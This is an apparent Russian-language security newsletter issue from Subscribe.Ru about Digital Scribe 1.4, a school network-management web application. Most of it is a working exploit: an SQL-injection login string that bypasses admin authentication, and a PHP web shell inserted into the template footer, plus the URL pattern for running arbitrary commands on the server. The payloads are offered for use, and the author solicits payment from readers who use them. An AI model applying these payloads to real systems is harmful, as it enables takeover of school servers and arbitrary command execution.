Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск по безопасности.


Информационный Канал Subscribe.Ru

Опасные продукты:
Digital Scribe
Безопансность
ПО: Digital Scribe
Версия: 1.4
Сайт: http://www.digital-scribe.org/

Описание:
Преподаватель получает возможность контролировать сеть через веб-интефрейс. Разработанный для простой установки, настройки и использования Digital Scribe может быть использован в тысячах школах. NoTeacher или ITPersonal необходмы для изучения компьютерных языков в интуитивно понятной форме.
Использование:
1) Обход входа в систему/SQL инъекция
логин как администратор
Логин: " or isnull(1/0) /*
Пароль: [любой]
2) Удаленный запуск кода.
Теперь вы можете редактировать шаблоны и запускать трояны на удаленной системе:
Поставьте в конце нижнего колонтитула:
<?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>
теперь вы можете запускать команды:
http://[цель]/[ путь_до_dscribe]/index.php?cmd=[некоторые_команды]
Если Вам нравится эта рассылка и Вы пользуетесь сведениями из неё, то можете поддержать автора, перечислив небольшое вознаграждение на R474348938531 или Z451490294903. Связаться со мной можно по ICQ 273214003.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться
Вспомнить пароль

В избранное